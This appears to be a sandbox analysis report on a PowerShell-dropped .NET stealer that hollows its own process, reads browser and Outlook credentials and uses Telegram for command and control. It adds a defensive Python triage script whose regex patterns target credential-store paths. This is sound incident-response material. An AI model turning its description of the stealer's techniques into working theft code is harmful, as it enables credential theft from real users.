Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Users\user\Desktop\believe.ps1 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RUNPEE.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: Yara match | File source: 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\x.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 4.2.x.exe.328c714.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.3287ec1.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.3287ec1.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.328c714.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1321698645.0000000003287000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR
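The behaviour lines in the evasion, injection and credential-theft sections above (the ten-minute thread delays, the MZ header written into a second x.exe at base 0x400000 right after x.exe spawned a copy of itself, and the opens of Chrome/Edge Login Data, Cookies and History plus the Outlook profile key) are the indicators a responder wants pulled out of such a report without reading every row. The script below is an added example written for this page, not Joe Sandbox code. It parses a handful of lines copied from this report (the sample list is constructed: the "Jump to behavior" link text is removed and a space is inserted between the source process and the event) and groups them into the indicator classes the report's own signatures describe. The 3-minute sleep threshold mirrors the report's "Contains long sleeps (>= 3 min)" signature; the credential-store path patterns are this example's assumptions.

```python
import re

# Constructed sample: lines copied from this report's behaviour sections, with the
# "Jump to behavior" link text removed and a space added between process and event.
SAMPLE_EVENTS = [
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599108",
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594125",
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Users\user\AppData\Local\Temp\x.exe base: 400000 value starts with: 4D5A",
    r'Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"',
    r'Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"',
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies",
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid",
]

# One report line: "Source: <process> <event kind>: <detail>".
EVENT_RE = re.compile(
    r"^Source: (?P<source>.+?) "
    r"(?P<kind>Thread delayed|Memory written|Process created|File opened|Key opened|Key value queried): "
    r"(?P<detail>.*)$"
)
DELAY_RE = re.compile(r"delay time: (?P<ms>\d+)")
MEM_WRITE_RE = re.compile(r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+) value starts with: (?P<prefix>[0-9A-Fa-f]+)$")
# Path patterns below are this example's assumptions: Chromium-family credential/history
# databases under "<browser>\User Data\<profile>\", the Outlook MAPI profile key, and
# mail-client profile folders.
BROWSER_STORE_RE = re.compile(r"\\User Data\\.*\\(Login Data|Cookies|Web Data|History|Top Sites)$", re.I)
MAIL_PROFILE_RE = re.compile(
    r"\\Windows Messaging Subsystem\\Profiles\\|\\Thunderbird\\Profiles|\\PostboxApp\\Profiles", re.I
)
FINGERPRINT_RE = re.compile(r"\\Cryptography MachineGuid$", re.I)

LONG_SLEEP_MS = 3 * 60 * 1000  # same threshold as the report's "Contains long sleeps (>= 3 min)"
PE_MAGIC = "4D5A"              # "MZ", the DOS header magic every PE image starts with


def triage(lines):
    """Group behaviour lines into the indicator classes a responder pulls from a report."""
    result = {
        "delays_ms": [],
        "pe_writes": [],        # (writer, target, base address, same executable image?)
        "process_tree": [],     # (parent image, child image)
        "browser_stores": [],
        "mail_profiles": [],
        "fingerprint_queries": [],
        "unparsed": [],
    }
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            result["unparsed"].append(line)
            continue
        source, kind, detail = m.group("source", "kind", "detail")
        if kind == "Thread delayed":
            d = DELAY_RE.search(detail)
            if d:
                result["delays_ms"].append(int(d.group("ms")))
        elif kind == "Memory written":
            w = MEM_WRITE_RE.match(detail)
            # A write whose first bytes are "MZ" places a whole PE image in the target:
            # the core of RunPE / process hollowing, not an ordinary data write.
            if w and w.group("prefix").upper().startswith(PE_MAGIC):
                target = w.group("target")
                same = source.lower() == target.lower()  # NTFS paths are case-insensitive
                result["pe_writes"].append((source, target, int(w.group("base"), 16), same))
        elif kind == "Process created":
            child = detail.split('"')[0].strip()  # drop the quoted command line, keep the image
            result["process_tree"].append((source, child))
        elif kind in ("File opened", "Key opened"):
            if BROWSER_STORE_RE.search(detail):
                result["browser_stores"].append(detail)
            elif MAIL_PROFILE_RE.search(detail):
                result["mail_profiles"].append(detail)
        elif kind == "Key value queried" and FINGERPRINT_RE.search(detail):
            result["fingerprint_queries"].append(detail)
    result["max_delay_ms"] = max(result["delays_ms"], default=0)
    result["long_sleep"] = result["max_delay_ms"] >= LONG_SLEEP_MS
    return result


def verdicts(summary):
    """Turn grouped indicators into the one-line findings of a triage note."""
    out = []
    if summary["long_sleep"]:
        out.append(f"sandbox evasion: longest single sleep {summary['max_delay_ms'] / 60000:.1f} min")
    for _writer, target, base, same in summary["pe_writes"]:
        how = "RunPE-style hollowing of a process with the same image" if same else "PE injection into a foreign process"
        out.append(f"{how}: MZ header written at 0x{base:X} in {target}")
    if summary["browser_stores"]:
        out.append(f"browser credential/history store access: {len(summary['browser_stores'])} file(s)")
    if summary["mail_profiles"]:
        out.append(f"mail profile access: {len(summary['mail_profiles'])} location(s)")
    if summary["fingerprint_queries"]:
        out.append("host fingerprinting: MachineGuid read")
    return out


if __name__ == "__main__":
    for finding in verdicts(triage(SAMPLE_EVENTS)):
        print(finding)
```

The "same image" check is what separates the pattern seen here (x.exe writing a PE into a freshly created x.exe, with RUNPEE.dll dropped alongside) from injection into an unrelated host such as a browser; both are worth a finding, but the response differs, since in the first case the on-disk x.exe is not the payload that actually ran.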

                      Remote Access Functionality

Source: Yara match | File source: 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the count the report shows for each technique that was triggered, techniques without a number were not triggered)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: PowerShell (1), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (111), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), Process Injection (111), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (21), Software Packing (1), Timestomp (1), DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: Security Software Discovery (11), Process Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), System Network Configuration Discovery (1), File and Directory Discovery (1), System Information Discovery (13), System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Email Collection (1), Archive Collected Data (11), Data from Local System (1), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Web Service (1), Encrypted Channel (11), Ingress Tool Transfer (13), Non-Application Layer Protocol (3), Application Layer Protocol (24), Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph (ID: 1638285, Sample: believe.ps1, Start date: 14/03/2025, Architecture: WINDOWS, Score: 100)

Sample-level network: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 2 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

Process tree:
  powershell.exe 16 (started)
    dropped: C:\Users\user\AppData\Local\Temp\x.exe, PE32
    signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
    x.exe 15 3 (started)
      network: 176.65.144.3, 49689, 80 PALTEL-ASPALTELAutonomousSystemPS Germany
      dropped: C:\Users\user\AppData\Local\Temp\RUNPEE.dll, PE32
      signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Injects a PE file into a foreign processes
      x.exe 2 (started)
        network: api.telegram.org 149.154.167.220, 443, 62172 TELEGRAMRU United Kingdom; checkip.dyndns.com 158.101.44.242, 49690, 49693, 49697 ORACLE-BMC-31898US United States; reallyfreegeoip.org 104.21.64.1, 443, 49691, 49692 CLOUDFLARENETUS United States
        signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
    conhost.exe (started)
  notepad.exe 5 (started)
